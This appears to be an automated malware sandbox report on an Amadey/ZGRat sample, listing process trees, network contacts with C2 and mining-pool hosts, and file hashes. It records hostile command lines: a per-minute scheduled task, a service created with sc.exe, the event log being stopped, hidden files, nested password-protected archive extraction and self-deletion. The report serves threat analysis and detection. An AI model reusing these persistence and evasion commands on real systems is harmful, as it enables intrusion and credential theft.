PID 1732 wrote to memory of 924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe

"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe

"C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe"

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

"C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe"

C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe

"C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe"

C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe

"C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p4632370330209207692137030328 -oextracted

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

"C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_9.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_8.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe

"C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "xfAk7rC2FeEN35Y8o.exe"

C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe

"xfAk7rC2FeEN35Y8o.exe"

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe

"C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "FLWCUERA"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "FLWCUERA"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

conhost.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {26E75C87-5A32-40B2-A05C-DB3831445712} S-1-5-21-3427588347-1492276948-3422228430-1000:QVMRJQQO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe

"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

Network

Country Destination Domain Proto
RU 185.215.113.68:80 185.215.113.68 tcp
FI 109.107.182.3:80 109.107.182.3 tcp
RU 185.215.113.68:80 185.215.113.68 tcp
DE 144.76.1.85:25894 tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
US 8.8.8.8:53 joxi.net udp
US 172.67.162.70:80 joxi.net tcp
US 172.67.162.70:443 joxi.net tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp

Files

memory/1588-0-0x0000000000260000-0x0000000000668000-memory.dmp

memory/1588-1-0x0000000000260000-0x0000000000668000-memory.dmp

memory/1588-3-0x00000000006F0000-0x00000000006F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

MD5 ec2c94a21a52027c229a7824d4a1c5ca
SHA1 b17aa25017bf7d0af7ffb946bcace0d51331d351
SHA256 cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e
SHA512 f44190b724851959ad712af3fecf4c397386b81a2c5f4258bd0b5ce028b173f29d57a296a448d1568d5de3eb25623f119cea3cabbee6c753890fe3e006df0761

memory/1588-13-0x0000000004520000-0x0000000004928000-memory.dmp

memory/2784-12-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/2784-15-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/1588-14-0x0000000000260000-0x0000000000668000-memory.dmp

\??\c:\users\admin\appdata\local\temp\F59E91F8

MD5 5cac70fbe2fc9869397bf1989e592841
SHA1 cc522bec3c1772269465799d35268630248e801b
SHA256 17e571023337ad513deb4d436c17573b6ab3c9ebf2a3e30425c3f5fa9a638806
SHA512 f56d8d7a996401404b850b6503960ea17d68fe56acbc06de8fa9c39b20dd7f01d24837283f459655ac4efb3da10a8864623cbb041ca9ad81bc9afd1ecf9b5fb9

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe

MD5 b65204b855a9031d3a1e8480899ed0ce
SHA1 bae418328b0bd303dc712a1861771451da0df0dc
SHA256 39dd749c32c81af709f676a0bcb808191244439090f6404aabb445d16723a2e2
SHA512 43c5309c42bacf69df58880b9dafdf2652fe3d66acad779c95bce29272de696d94cdb5bd3437ab192db99cf44eedf3da4b3e7483db15cdcbe22ea3d721210a60

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe

MD5 cb0c32dbd9299ced29a49721c9665815
SHA1 0c90839639eed636b94f8f2ca43dee0f495e6218
SHA256 7d87e7dbcb78412a71770d9b6361611af4062ef29ece3878c9ed921fbe5672da
SHA512 a90c2bf577c6c5f1161863025dc8fb48fe253a5cb4a071a425f009599495fea17a2cbb1017317e162fc3ef99c090ed6e63dda2071e802def364654d4cd59df12

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

MD5 d5af5fe1f4a7f598abfefdba5f2c755d
SHA1 fbf50fd43a5ac059b35f239e1ad7c710289800cb
SHA256 d4027a5e8436b4887830bc890345cb061a0b6d38962f76f68990424345a8b840
SHA512 db3dea30f75728a0010f31d72981342a2b851d2b6f41718b8bd9351e6153ff3fdb03509bde8ee5fed52c12f3522790562a6508e7140a50486218ef01bf5626d5

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

MD5 dc41db2f1a79d6a6fe0d35c842b39adc
SHA1 59b155df668de78669f45a741dc1581f835d674d
SHA256 fcc65263f1b2ce58bf23b3c1da6ac08b8b10ff1824d100a4852f01a9832013a3
SHA512 361a79323e6cb03a01ae2d641cd7952425bf41ede79de770c2e79312c67f8338a72c3d979da86feaa3a224661623533a222891d547e61fbe237e395f5fdd84ca

\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

MD5 73102c5b3abea202c716dc000639501f
SHA1 9f25b23dc8c3132f707490b747bdc110aa0a1bf4
SHA256 47ead837fbf7d50b81ee8cde52fc82fe07134b3a522e1ca5fe80f0c9ff55df30
SHA512 90e999b71ae0aa7ac6cf7488ace95d571ec57360cfdd8d889c467945f908272204e276c167ff4621f14e3d22d3366d482d3cb962f1d3a7261a822e77b2a59163

memory/2784-48-0x0000000004730000-0x0000000004C13000-memory.dmp

memory/1728-49-0x0000000001120000-0x0000000001603000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe

MD5 d177caf6762f5eb7e63e33d19c854089
SHA1 f25cf817e3272302c2b319cedf075cb69e8c1670
SHA256 4296e28124f0def71c811d4b21284c5d4e1a068484db03aeae56f536c89976c0
SHA512 9d0e67e35dac6ad8222e7c391f75dee4e28f69c29714905b36a63cf5c067d31840aaf30e79cfc7b56187dc9817a870652113655bec465c1995d2a49aa276de25

memory/2552-72-0x0000000001E90000-0x0000000001ED2000-memory.dmp

memory/2552-86-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2552-98-0x0000000004830000-0x0000000004870000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 4b3a5b96f9eedd8626a8c12976765b56
SHA1 85307e380d233c8229f9e0de16ed82821221a0be
SHA256 1651b6ed815b2128c2362ad38a7cfcdafc6c5f8705572626c872ad788c41f6ef
SHA512 b274c74ebf059fa203408a120a2c6f54f769d93d34d916aad9b4f712455b3ffe396e325744d2488a090dafb1c4621f83428719c8fe20d93b10904953dcdc8790

memory/2140-101-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2552-102-0x0000000004830000-0x0000000004870000-memory.dmp

memory/2140-103-0x00000000048C0000-0x0000000004900000-memory.dmp

memory/2552-104-0x0000000004830000-0x0000000004870000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 5adb0fa82d102152c869f831bdf2ad89
SHA1 bba32248250524ba6ef6dd499462ddc02e2bc720
SHA256 2055429dc5a7506e14e3fc328a278c61992147ed12a368243f1a5e5535f7a327
SHA512 e20d652ff39c95ca34c8ad6378e15b24853f23ad34c1e610eead1bee39f0aaef1187abc120e9b3a96e16b58ec38d929d71e220e17ad968f8c8f7a5f328cb9681

\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

MD5 2fadc3984b71f0fd08c832adeedf2b52
SHA1 cc1fc06a55af72364fb0a1266d3f5936577162f9
SHA256 34f47e63788cdb398c48ad06f3878ec9bce9fd0e261306b2c81b3796925f9240
SHA512 63e8127e2d44cd98cd6225eb8d1f348f5e3e7d7f86900e2f949329f6d35a943147aa1fb72061a8868cfcd9e53fde536dc870b3a9c9248b6aab067774b1654685

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

MD5 5eca966dd56f0189904b8240878cba81
SHA1 770520d011c21409b93a77bf45fc858ccaaaa8af
SHA256 b09dd6fd6cb440cd5263f442082effb1089961d2c1ff86dd5cc5e47e78aa350e
SHA512 99cdf082fe098418a33eeba18799b6ccf22e08de99cab546f0add72d941fec7363c0a8d073283369c7cbd66d67ebdb0803215d19944aa30db576d467a65c2953

memory/2784-133-0x00000000001D0000-0x00000000005D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_9.zip

MD5 40235b44032f0152340cf8abf962b5cc
SHA1 a47551c300cb4491e9dc82734466d243e8eee584
SHA256 3a424ab07ae35d2f8ecee2b7117b477b092c429d49323eba29ba0afe15a1ad22
SHA512 82fdf657ba3c6be68d266218c15c58b2fb758d82241e86459f0a30e6c2bb4728a62f2c14a1a52df79c118cf2c9e6e19690e5f8a408acf5cf9a4455cd7145eaf3

\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 931afc729d4dc9c815f25a6e71605882
SHA1 cb03ffc5bdfad24ea2f85bc72302b8b518b8c841
SHA256 e6610aee9c7eccfd728c524ef30047f1fff02f5023e80a6f7f0dc41a9642dbff
SHA512 7071d8d9ed5c8a63ac4cbbc16ee53417b4e2c8fb5007f901e5d538f43859d343816758d22e96a9ef3d3e22318206068cdca1a213be77da8d382bde0d851622ad

memory/1808-134-0x00000000737B0000-0x0000000073E9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

MD5 219bbf6cbe4a20ce93e50137a47c9be3
SHA1 25d68c1f11d5624bcc94e5bf9d382fad55d3058f
SHA256 47d7c430478b2cc240f9077f22051146c30412868ada9289c819c9ec16c612ae
SHA512 17df2bd3a6d83f91690ec806056b34a9860216c259a16c7e7cfcc1a8f7ce823e5e58474b4ae38b876fb0f5ec8f338f819e69276fb63b635b757e26351127ba1a

memory/1808-131-0x0000000000990000-0x0000000000A9A000-memory.dmp

memory/2784-125-0x00000000001D0000-0x00000000005D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe

MD5 3c9da20ad78d24df53b661b7129959e0
SHA1 e7956e819cc1d2abafb2228a10cf22b9391fb611
SHA256 2fd37ed834b6cd3747f1017ee09b3f97170245f59f9f2ed37c15b62580623319
SHA512 1a02da1652a2c00df33eceda0706adebb5a5f1c3c05e30a09857c94d2fbb93e570f768af5d6648d3a5d11eea3b5c4b1ceb9393fc05248f1eefd96e17f3bbe1b4

memory/2156-161-0x0000000001300000-0x000000000136C000-memory.dmp

memory/2156-157-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2140-164-0x00000000048C0000-0x0000000004900000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 1b7c22a214949975556626d7217e9a39
SHA1 d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512 ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

memory/2156-174-0x0000000004E50000-0x0000000004E90000-memory.dmp

memory/2552-165-0x0000000004830000-0x0000000004870000-memory.dmp

memory/1808-163-0x00000000005E0000-0x0000000000620000-memory.dmp

memory/2552-151-0x0000000002120000-0x000000000215E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

MD5 aaa97cae61f10770ab65892fb10b827d
SHA1 0f5f5b27b4603a2a9a6d778263ca402d22fc964f
SHA256 96767258e636d6cd1334d3ca67a1d9f483a090a78d9bafbd3a7bc8837ec998c3
SHA512 dde8270e6699050ce428bfb442d95089b97ad2c351efe9d5d9898a4cd0ded3f5e88f22572a6aecb72a0250b4f3f76ddf933f9853f5761d5676719c886d15d295

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

MD5 11f1ca0c43391dc92905d9f728428e68
SHA1 2287377b147573503e20abd97330a681eca88b9d
SHA256 704255efb181a254b7ee6da512ea67db6243881c8dfddd520337d1a3aa4ee9b5
SHA512 14ef19ebb5eb017edeb203f263c4f64f9f58adb5715ce11dab258ff09b51bcdf072cc9678ca110fcc0cf4e43f9c64726d0b719b95408b2c321c1bb5baf8cc62c

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 29d5a47c9a1eccdbd25c49cd540f742f
SHA1 81332aed09c142f8ee235c0303c9cae2466a96f3
SHA256 bd48f756c7c1d7883b2ae5934260ce04b08e488108ca75953a8e8fe9ee89770c
SHA512 051039bc5e23fdc0273c7f6e78655c285de84f2b64358af857d5a25d9df01515fedd5ec0f91c7e8d9a8faf00c9a2412d3b0c322a4110ce335fae4abd6fecd089

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 fe835c127049c665c997e7bf7b5b85f5
SHA1 fe1b418c2b5eca8f800db39a3740b276c95a41ea
SHA256 620d0bb3e2f0f8ac7e96623f89842433a4bea299f9d8c8481fba868ba15f8930
SHA512 284244c3887ce3f10d387c56e59969f763de33517f36c2393e4bee56fb91306f3e0c5b2e162f37c07b490e6a354e57edd71b31317509191eaa4879140c08a680

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 781e90fd2d92487c572cb80b35067285
SHA1 0b436e2afdd1cc954ddc86b22500540624d0e598
SHA256 037ecc54896d74db57489337f7ffff292ad7f8e650833689efc763293e0ae6f1
SHA512 13f47e023297520eb0a0f3aff657158d91c92cb770ed706ad73b95e087bec22e0475e28f427af853c2786b9b2fa8cb7f2fa06ccde847f3f3e32d93d7fe10685a

memory/2784-215-0x0000000004730000-0x0000000004C13000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 eb8ae67add0315dd587f99d81e0f53f7
SHA1 8d2e1afc03e3549775065f541417778eea6c3e6e
SHA256 95379f57e916b94e093e3bef9f4a7d92869951b6c369c5801fedd48a72b5efde
SHA512 4485773f12fcb34a1fed8e9b764c98e629239e51d99623deba17c237e59d1ad23ad2d755cd0917cb6789b0c52471c9b21f8c0ff2898c8e74ea0b577930d2079a

\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 e27ed9139b5deae4b799ef17880eb82f
SHA1 210f8087ce88aeb5eb0cdd8a7992adbd3cb35e1e
SHA256 b293901df19277cd5908ea67aa9503839631ae19f312eaf378296f0642f18ead
SHA512 4fa7c75230a7f5a8b760534a28cc74f7beff2fc302c9ac70e6de9544e4d892e09387351ace4d523c4f0e18c2bdff5fffc0f15bf680cad88dc54a65b3a978167e

\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 2ac9bea08704210b2537fcbd3f244496
SHA1 8ee3e4f4b2a582c97b80a3f5a0e2344c43d6bfa3
SHA256 c3c3ac7c56ca6e9387dbf41b1a3e3708ece828b6260a30f8a5d67d4ae27763fd
SHA512 7db3f1988b0384046a837c9df0917be5810b1596477643eaa2fa40fd2e21a52756a1d58616b8445d1c08aada48bf5ba972bfa3f6dba392f448f9678bab441682

memory/1728-223-0x0000000001120000-0x0000000001603000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 24ca7dbb6f0cc43aa650807593091ff2
SHA1 db0e37151a82120c3519f3b587b8ad452e96fc75
SHA256 216f5cd816b0bbc83a27d4d9198994a85eca951e571983e82e3d9fa51a1aac8f
SHA512 2b13d8e66979ede339338f786db9d8788ac4aac3d383ed2e491c51418022c6342484d659cdc4fd55f3b03141286cfc245187a978ef5fdf9c9d015dbd1dea9d86

memory/2552-233-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/1728-234-0x0000000001120000-0x0000000001603000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 49de8961e3d7dcbc6a0bc6d5800c17dd
SHA1 7b5b96d1217b8a6fc1587a8920ea587d86a804c3
SHA256 bf26a770ef4fdd475d4789eb9e9572c6b3dba2d81159f4e2e15bdd4bc11b3b95
SHA512 bbee597d3940403a51ad4defdd9e8b56cb575d44d7513a630ad82def0a401a4eeade58d93e7d2819d7e6c0d55a430916ab0a9cf9bb6f69d0b510a84ddab2b118

C:\Users\Admin\AppData\Local\Temp\main\extracted\xfAk7rC2FeEN35Y8o.exe

MD5 54ce50e8d50599046a20a47555dfb5eb
SHA1 96a891edc54ba1f6d66fbdde47c884e535c83ebe
SHA256 3662c80499b08fe24e982ab558897cfca2cd5e7198b1519bc4490a8551b486ac
SHA512 e787782b960dd3d36972616c42be13e66ad15c3ae6c3e3c8c8f04c5667529568a8c7ecceca8a2971fc71b039aea63cb6ebfb49c3263d82a9fb2f654ccb133892

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 22a25a629e495aed50731591b05c997a
SHA1 cb93590710e0b2b142fe252f775015237dad10da
SHA256 16a82ffd653bacaa05e181ec61b0900077955187288908e75c332d3fb54a368d
SHA512 64d71421cf124e3b4c66020e8ab7a6760625ec40cbb2e960e87d5ad5683cdd09f37bd26353dd98a5a5068ae712c0b6a05a5deff08dea1d4a4cb7da837c6376d2

memory/2156-235-0x0000000002770000-0x0000000004770000-memory.dmp

memory/1808-236-0x0000000002030000-0x000000000212E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe

MD5 f4ec0a6240099958d490c053e0a1b6d4
SHA1 b00d1d9ec4991c6156d508504276f7fb6428096a
SHA256 99b156a2926cc2dd2be7df741563a66aef1af075f835cb2b42835eba792f2f70
SHA512 60193ad4993cb45a8f859336d38c1af29e9528cd65350c804e856846fcb74276f3e44f470ada4ebe353eeba8f6c6e644c3d500ad695f6951a25516c190189bd4

memory/2784-250-0x0000000004610000-0x000000000504D000-memory.dmp

memory/2784-251-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/2784-252-0x0000000004610000-0x000000000504D000-memory.dmp

memory/2552-253-0x0000000004830000-0x0000000004870000-memory.dmp

memory/2140-254-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2984-255-0x000000013FCD0000-0x000000014070D000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 85af6c99d918757171d2d280e5ac61ef
SHA1 ba1426d0ecf89825f690adad0a9f3c8c528ed48e
SHA256 150fb1285c252e2b79dea84efb28722cc22d370328ceb46fb9553de1479e001e
SHA512 12c061d8ff87cdd3b1f26b84748396e4f56fc1429152e418988e042bc5362df96a2f2c17bcf826d17a8bae9045ee3ba0c063fb565d75c604e47009ff442e8c8e

memory/2216-269-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-268-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-267-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-270-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2552-273-0x0000000004830000-0x0000000004870000-memory.dmp

memory/2216-272-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2984-266-0x000000013FCD0000-0x000000014070D000-memory.dmp

memory/2216-275-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-280-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-278-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2980-281-0x000000013FF70000-0x00000001409AD000-memory.dmp

memory/2492-282-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2492-283-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2492-284-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2156-286-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2492-285-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2492-287-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2484-291-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-292-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2492-290-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2484-293-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-296-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-295-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-294-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-297-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-299-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-298-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-302-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-303-0x00000000001B0000-0x00000000001D0000-memory.dmp

memory/2980-301-0x000000013FF70000-0x00000001409AD000-memory.dmp

memory/2784-304-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/1728-305-0x0000000001120000-0x0000000001603000-memory.dmp

memory/1808-306-0x0000000002030000-0x0000000002128000-memory.dmp

memory/2140-308-0x00000000048C0000-0x0000000004900000-memory.dmp

memory/1808-307-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1728-310-0x0000000001120000-0x0000000001603000-memory.dmp

memory/1808-311-0x0000000002030000-0x0000000002128000-memory.dmp

memory/2140-313-0x00000000048C0000-0x0000000004900000-memory.dmp

memory/1808-314-0x0000000002030000-0x0000000002128000-memory.dmp

memory/2484-316-0x0000000140000000-0x0000000140840000-memory.dmp

memory/1808-317-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1992-318-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/1808-332-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-330-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-328-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-326-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-324-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-321-0x0000000002030000-0x0000000002128000-memory.dmp

memory/2484-319-0x0000000140000000-0x0000000140840000-memory.dmp

memory/1808-477-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/1808-573-0x00000000005E0000-0x0000000000620000-memory.dmp

memory/2140-574-0x00000000048C0000-0x0000000004900000-memory.dmp

memory/2552-575-0x0000000004830000-0x0000000004870000-memory.dmp

memory/2484-577-0x0000000000250000-0x0000000000270000-memory.dmp

memory/2384-582-0x00000000013D0000-0x00000000013D8000-memory.dmp

memory/2384-600-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

memory/1868-614-0x0000000000250000-0x0000000000350000-memory.dmp

memory/1784-621-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2784-620-0x0000000004610000-0x000000000504D000-memory.dmp

memory/2784-622-0x0000000004610000-0x000000000504D000-memory.dmp

memory/1784-623-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/1784-624-0x0000000004EC0000-0x0000000004F00000-memory.dmp

memory/1992-626-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/1784-627-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2568-637-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/2484-639-0x0000000000250000-0x0000000000270000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-24 04:15

Reported

2024-01-24 04:17

Platform

win10v2004-20231222-en

Max time kernel

24s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
